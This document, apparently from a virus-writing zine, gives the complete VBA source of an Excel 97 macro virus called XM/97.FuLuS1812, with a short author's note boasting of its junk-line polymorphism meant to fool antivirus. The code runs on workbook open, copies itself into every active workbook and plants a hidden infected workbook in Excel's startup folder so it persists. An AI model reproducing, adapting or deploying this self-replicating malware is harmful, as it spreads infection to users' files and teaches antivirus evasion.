컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴
Psycodes #1
Code By : Psychologic
Email   : Psychologic@hotmail.com
Home    : http://psychologic.uni.cc
컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴컴
XM/97.FuLuS1812
***************

FuLuS1812 originaly has an 1812 Bytes x97.Macro virus,Made when Im in Singapore with my Dad,Has
an Simple Polymorphsm Engine, By Inserting Junk Bytes with "ReM " before Junks,Purposed to fake
AV By The File size,I don't know is it scaned as virus or not cos I never test it before.Cos of
that,Im not adding the binary in *.zip. Yup I Hope you Understand. Bye..

***********************************************************************************************
Attribute VB_Name = "FuLuS-1812" 
Sub Auto_Open()
Randomize
If Int((Rnd*9) + 1) <> 5 Then
	MsgBox "FuLuS-1812 virus exist on your Computer,go clean it now..!!", vbOkOnly, "FuLuS-1812 By Psychologic"
End If
Application.OnSheetActivate = "Fulus"
End Sub
Sub Fulus()
On Error Resume Next
FuLuS1 = "FuLuS-1812":FuLuS2 = "FuLuz.xLs"
FuLuS3 = Application.StartupPath & "\" & FuLuS2
FuLuS4 = 0:FuLuS5 = 0
Randomize
aCtLine = Application.VBE.ActiveVBProject.VBComponents("FuLuS-1812").CodeModule.CountOfLines
If aCtLine > 300 Then
	With Application.VBE.ActiveVBProject.VBComponents("FuLuS-1812").CodeModule
		For i = 1 To .CountOfLines
			If Left(.Lines(i, 1), 3) = "Rem" Then .DeleteLines i
		Next i
	End With
Else
	With Application.VBE.ActiveVBProject.VBComponents("FuLuS-1812").CodeModule
		PoLyViR = Int(Rnd * 10)
		For f = 1 To PoLyViR
			PoLyStR = "
			LiNePoLy = .CountOfLines
			RndLine = Int(Rnd * LiNePoLy) + 1
			StringSize = Int(Rnd * 39) + 1
			For SomeString = 1 To StringSize
				PoLyStR = PoLyStR & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
			Next SomeString
			.InsertLines RndLine, "Rem " & PoLyStR
		Next f
	End With
End If
Application.VBE.ActiveVBProject.VBComponents.Item(FuLuS1).Export "C:\FuLuS-1812.ini"
If Dir(FuLuS3) = FuLuS2 Then FuLuS5 = 1
	For x = 1 to ActiveWorkbook.VBProject.VBComponents.Count
		If ActiveWorkbook.VBProject.VBComponents(x).Name = FuLuS1 Then FuLuS4 = 1
	Next x
	If FuLuS4 = 0 Then
		ActiveWorkbook.VBProject.VBComponents.Import "C:\FuLuS-1812.ini"
		ActiveWorkbook.Save
	End If
If FuLuS5 = 0 Then
	Workbooks.Add.SaveAs FileName:=FuLuS3
	ActiveWorkbook.VBProject.VBComponents.Import "C:\FuLuS-1812.ini"
	ActiveWindow.Visible = False
	Workbooks(FuLuS2).Save
End If
End Sub
***********************************************************************************************